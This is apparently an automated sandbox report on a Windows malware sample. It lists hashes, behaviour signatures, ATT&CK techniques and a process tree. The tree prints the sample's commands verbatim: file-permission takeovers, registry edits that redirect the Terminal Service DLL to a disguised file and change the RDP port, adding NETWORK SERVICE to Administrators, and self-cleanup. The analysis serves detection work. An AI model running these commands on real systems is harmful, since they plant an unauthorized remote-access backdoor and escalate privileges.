Analysis

  • max time kernel
    41s
  • max time network
    10s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-11-2020 21:08

General

  • Target

    7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe

  • Size

    3.8MB

  • MD5

    00ae90dd7e86dc9f42dd6df84652122d

  • SHA1

    ce09069c7a20d4ac0ce4169a27eab84d3d0e5fdf

  • SHA256

    7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860

  • SHA512

    835808a455f963ffb37bb7d3fabdf7f52f0435b1a4f2e4600148024c25657f4ab579f44c444239d118183365eb8e73820c52fabbf8cb4f49b9372f62633fdee5

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • Deletes itself 1 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 116 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
    "C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:740
    • \??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qmykaccf\qmykaccf.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1256
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES66FD.tmp" "c:\Users\Admin\AppData\Local\Temp\qmykaccf\CSCE1691FAC51404577BC51CA686B372D14.TMP"
          4⤵
            PID:328
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1084
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:520
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1304
        • C:\Windows\SysWOW64\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:632
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1476
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1468
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:384
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1256
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1640
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1868
        • C:\Windows\SysWOW64\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1248
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:992
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:1680
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:2036
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
                PID:1976
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  4⤵
                    PID:1436
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  3⤵
                    PID:1600
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net start rdpdr
                      4⤵
                        PID:1568
                        • C:\Windows\SysWOW64\net.exe
                          net start rdpdr
                          5⤵
                            PID:1396
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 start rdpdr
                              6⤵
                                PID:1576
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                          3⤵
                            PID:1304
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net start TermService
                              4⤵
                                PID:1744
                                • C:\Windows\SysWOW64\net.exe
                                  net start TermService
                                  5⤵
                                    PID:1560
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 start TermService
                                      6⤵
                                        PID:1788
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                  3⤵
                                    PID:784
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                    3⤵
                                      PID:864

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Persistence

                                Account Manipulation

                                1
                                T1098

                                Registry Run Keys / Startup Folder

                                1
                                T1060

                                Modify Existing Service

                                1
                                T1031

                                Defense Evasion

                                Modify Registry

                                3
                                T1112

                                File Permissions Modification

                                1
                                T1222

                                Lateral Movement

                                Remote Desktop Protocol

                                1
                                T1076

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03bfaf74-c48a-406b-812c-2684df821d22
                                  MD5

                                  597009ea0430a463753e0f5b1d1a249e

                                  SHA1

                                  4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

                                  SHA256

                                  3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

                                  SHA512

                                  5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
                                  MD5

                                  02ff38ac870de39782aeee04d7b48231

                                  SHA1

                                  0390d39fa216c9b0ecdb38238304e518fb2b5095

                                  SHA256

                                  fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

                                  SHA512

                                  24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6389faef-9880-4a2a-9aeb-21541e5feea3
                                  MD5

                                  7f79b990cb5ed648f9e583fe35527aa7

                                  SHA1

                                  71b177b48c8bd745ef02c2affad79ca222da7c33

                                  SHA256

                                  080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                  SHA512

                                  20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
                                  MD5

                                  df44874327d79bd75e4264cb8dc01811

                                  SHA1

                                  1396b06debed65ea93c24998d244edebd3c0209d

                                  SHA256

                                  55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

                                  SHA512

                                  95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9edd5193-5c48-4434-b682-81e89c1ccbca
                                  MD5

                                  d89968acfbd0cd60b51df04860d99896

                                  SHA1

                                  b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                  SHA256

                                  1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                  SHA512

                                  b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
                                  MD5

                                  75a8da7754349b38d64c87c938545b1b

                                  SHA1

                                  5c28c257d51f1c1587e29164cc03ea880c21b417

                                  SHA256

                                  bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

                                  SHA512

                                  798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
                                  MD5

                                  5e3c7184a75d42dda1a83606a45001d8

                                  SHA1

                                  94ca15637721d88f30eb4b6220b805c5be0360ed

                                  SHA256

                                  8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

                                  SHA512

                                  fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
                                  MD5

                                  b6d38f250ccc9003dd70efd3b778117f

                                  SHA1

                                  d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

                                  SHA256

                                  4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

                                  SHA512

                                  67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce109cce-8fb6-41d8-b4f6-63dc7018b67d
                                  MD5

                                  354b8209f647a42e2ce36d8cf326cc92

                                  SHA1

                                  98c3117f797df69935f8b09fc9e95accfe3d8346

                                  SHA256

                                  feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

                                  SHA512

                                  420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
                                  MD5

                                  be4d72095faf84233ac17b94744f7084

                                  SHA1

                                  cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

                                  SHA256

                                  b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

                                  SHA512

                                  43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadf780e-0f00-49bb-86e1-35585efd8a97
                                  MD5

                                  a725bb9fafcf91f3c6b7861a2bde6db2

                                  SHA1

                                  8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

                                  SHA256

                                  51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

                                  SHA512

                                  1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_feea166d-08f9-4115-b668-a8131fbb5938
                                  MD5

                                  a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                  SHA1

                                  81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                  SHA256

                                  dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                  SHA512

                                  8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                  MD5

                                  416febabbaa7d4b5b951bdf60cb21e26

                                  SHA1

                                  b638312d1d8b59b5664d177a3507e9b397a7ce13

                                  SHA256

                                  d7479ac60e18c14beb6b60fc400668a371a75b945db52526bec6b8e459230b63

                                  SHA512

                                  0faf43a4428323c9b2e3ca62ac0401784c6dab156bd8d605d5bfabb6271c980210103007daa8c5c7660e54de3bd28a5a52729fb55f0d0357a69db0a2c5bb3288

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                  MD5

                                  5dbfa74f5bcfd86ceccc7d07c3b1e5d4

                                  SHA1

                                  a7d1ff741fbd5805e1392b4b40767435a53fdaf5

                                  SHA256

                                  7046c26e91c1f2fd5c4c55a92da35d97da3aa5c254135418f2218b3ce0993a29

                                  SHA512

                                  d4459ea8f74e529afea94355321bd8ac9bf70ec7a8a402410440913af383e9790c020f9d265fa1b3cbad02136a8c24e0b5e1008f8962bb500629d174c558899b

                                • C:\Users\Admin\AppData\Local\Temp\RES66FD.tmp
                                  MD5

                                  2753e90f04fda53e14da3f83d45507e5

                                  SHA1

                                  4a9acea2dd21b6c37505deb16a959fa0725a2aca

                                  SHA256

                                  e7c8859b1be779f7882f5f69e207edc6fe21c57e4846b06fd541ae1eec8bf66e

                                  SHA512

                                  27d64d714d1d13df33ada539bfc11ca1f41a2725f10dc99f04a7531ad90d0beb6ac9a1a8c1f2101132a505cca3772d3b95d65184da9c35a4e15e659372ced0a2

                                • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                  MD5

                                  851bf8df96899b2cc50af8047e9fbe5c

                                  SHA1

                                  e259d3ea9eabae926f74358b6e8f583cfcb4106b

                                  SHA256

                                  b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6

                                  SHA512

                                  648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792

                                • C:\Users\Admin\AppData\Local\Temp\qmykaccf\qmykaccf.dll
                                  MD5

                                  e8dc930c151aa8ad20386d65a6f97b59

                                  SHA1

                                  6341efa6be962ffebc816b59893f809fc02b2366

                                  SHA256

                                  39dd592ccc85e6b46230ae64a2b1ff9baf0ee19333c601b307f997899cdc975d

                                  SHA512

                                  e342f458b1e360850b007912e4ade2068cbf29e834c97a09da25c8cebf7c441dd7ab9f9f7bd7c8ecd36e5e6bdf3999860392b926f5059c9ceef6996022afb095

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                  MD5

                                  862b20d32558ba691643c8f9710b5daf

                                  SHA1

                                  9632f0916ee778a5d4c4cc7d83178283caceb363

                                  SHA256

                                  ca54f52086e57a87c0d711da1ae032502c0b8d7bac767cd91d10d9fd0dd71232

                                  SHA512

                                  024896225b925968b7533fd7bd56efb8468cf9b627e8bce4da4929c9c7992fc554b8522ac76074a0381594356948061e36f9cf502cac2e3ad2909399594f9868

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                  MD5

                                  862b20d32558ba691643c8f9710b5daf

                                  SHA1

                                  9632f0916ee778a5d4c4cc7d83178283caceb363

                                  SHA256

                                  ca54f52086e57a87c0d711da1ae032502c0b8d7bac767cd91d10d9fd0dd71232

                                  SHA512

                                  024896225b925968b7533fd7bd56efb8468cf9b627e8bce4da4929c9c7992fc554b8522ac76074a0381594356948061e36f9cf502cac2e3ad2909399594f9868

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                                  MD5

                                  862b20d32558ba691643c8f9710b5daf

                                  SHA1

                                  9632f0916ee778a5d4c4cc7d83178283caceb363

                                  SHA256

                                  ca54f52086e57a87c0d711da1ae032502c0b8d7bac767cd91d10d9fd0dd71232

                                  SHA512

                                  024896225b925968b7533fd7bd56efb8468cf9b627e8bce4da4929c9c7992fc554b8522ac76074a0381594356948061e36f9cf502cac2e3ad2909399594f9868

                                • C:\Windows\SysWOW64\rfxvmt.dll
                                  MD5

                                  dc39d23e4c0e681fad7a3e1342a2843c

                                  SHA1

                                  58fd7d50c2dca464a128f5e0435d6f0515e62073

                                  SHA256

                                  6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                  SHA512

                                  5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                • \??\c:\Users\Admin\AppData\Local\Temp\qmykaccf\CSCE1691FAC51404577BC51CA686B372D14.TMP
                                  MD5

                                  d4ae50fb6e9e25875a254c282b9bb85f

                                  SHA1

                                  265af7b99501d6ab2dac06b07d047acaf88a7570

                                  SHA256

                                  143c0a785a6c01316229f31248c4a9eecd78bfd4e1049a44bae871d58bbbeb7b

                                  SHA512

                                  fd1ce2d4ad8d2c18bb3ab67c1683c52c9627f26dbafd0d500441b687db47b1a631bd7933b728d669ecd4369a9b743c5d9ce97fcdedd2ee8520725327bf060c89

                                • \??\c:\Users\Admin\AppData\Local\Temp\qmykaccf\qmykaccf.0.cs
                                  MD5

                                  6f235215132cdebacd0f793fe970d0e3

                                  SHA1

                                  2841e44c387ed3b6f293611992f1508fe9b55b89

                                  SHA256

                                  ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                  SHA512

                                  a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                • \??\c:\Users\Admin\AppData\Local\Temp\qmykaccf\qmykaccf.cmdline
                                  MD5

                                  78014a1c86c63f21f0aedf7511dce0f1

                                  SHA1

                                  d98bf1b19803b14698e62a0eeb67a3765d6ac310

                                  SHA256

                                  c3a1aa765562f12849ca162098c382ddf95e9a5967f1aa8c3bd151d5f99db8d0

                                  SHA512

                                  60044d977611b27615eb7b94fdeab4966f91c45269d946206f3db9214533b819eea649f1a2a69a935f7d9f57b91b836c04bd95670e4251254d52a99112edfcab

                                • memory/328-27-0x0000000000000000-mapping.dmp
                                • memory/384-108-0x0000000000000000-mapping.dmp
                                • memory/520-81-0x0000000005600000-0x0000000005601000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/520-77-0x0000000004900000-0x0000000004901000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/520-73-0x0000000073EB0000-0x000000007459E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/520-71-0x0000000000000000-mapping.dmp
                                • memory/520-82-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/632-101-0x0000000000000000-mapping.dmp
                                • memory/784-140-0x0000000000000000-mapping.dmp
                                • memory/864-142-0x0000000000000000-mapping.dmp
                                • memory/992-119-0x0000000000000000-mapping.dmp
                                • memory/1084-69-0x0000000005DF0000-0x0000000005DF1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1084-70-0x0000000005E40000-0x0000000005E41000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1084-44-0x00000000054A0000-0x00000000054A1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1084-43-0x00000000054F0000-0x00000000054F1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1084-39-0x00000000053B0000-0x00000000053B1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/1084-35-0x0000000073EB0000-0x000000007459E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/1084-33-0x0000000000000000-mapping.dmp
                                • memory/1248-116-0x0000000000000000-mapping.dmp
                                • memory/1256-110-0x0000000000000000-mapping.dmp
                                • memory/1256-24-0x0000000000000000-mapping.dmp
                                • memory/1304-88-0x0000000000000000-mapping.dmp
                                • memory/1304-135-0x0000000000000000-mapping.dmp
                                • memory/1304-90-0x0000000073EB0000-0x000000007459E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/1396-132-0x0000000000000000-mapping.dmp
                                • memory/1436-128-0x0000000000000000-mapping.dmp
                                • memory/1468-106-0x0000000000000000-mapping.dmp
                                • memory/1476-104-0x0000000000000000-mapping.dmp
                                • memory/1560-137-0x0000000000000000-mapping.dmp
                                • memory/1568-131-0x0000000000000000-mapping.dmp
                                • memory/1576-133-0x0000000000000000-mapping.dmp
                                • memory/1600-130-0x0000000000000000-mapping.dmp
                                • memory/1640-112-0x0000000000000000-mapping.dmp
                                • memory/1680-122-0x0000000000000000-mapping.dmp
                                • memory/1744-136-0x0000000000000000-mapping.dmp
                                • memory/1788-138-0x0000000000000000-mapping.dmp
                                • memory/1868-114-0x0000000000000000-mapping.dmp
                                • memory/1976-127-0x0000000000000000-mapping.dmp
                                • memory/2020-14-0x00000000080B0000-0x00000000080B1000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-32-0x0000000005550000-0x0000000005551000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-3-0x0000000004800000-0x0000000004801000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-4-0x0000000002450000-0x0000000002451000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-0-0x0000000000000000-mapping.dmp
                                • memory/2020-5-0x0000000004790000-0x0000000004791000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-9-0x0000000008060000-0x0000000008061000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-1-0x0000000073EB0000-0x000000007459E000-memory.dmp
                                  Filesize

                                  6.9MB

                                • memory/2020-15-0x0000000008290000-0x0000000008291000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-22-0x0000000008230000-0x0000000008231000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-23-0x0000000008390000-0x0000000008391000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-31-0x0000000008360000-0x0000000008361000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2020-2-0x0000000000440000-0x0000000000441000-memory.dmp
                                  Filesize

                                  4KB

                                • memory/2036-125-0x0000000000000000-mapping.dmp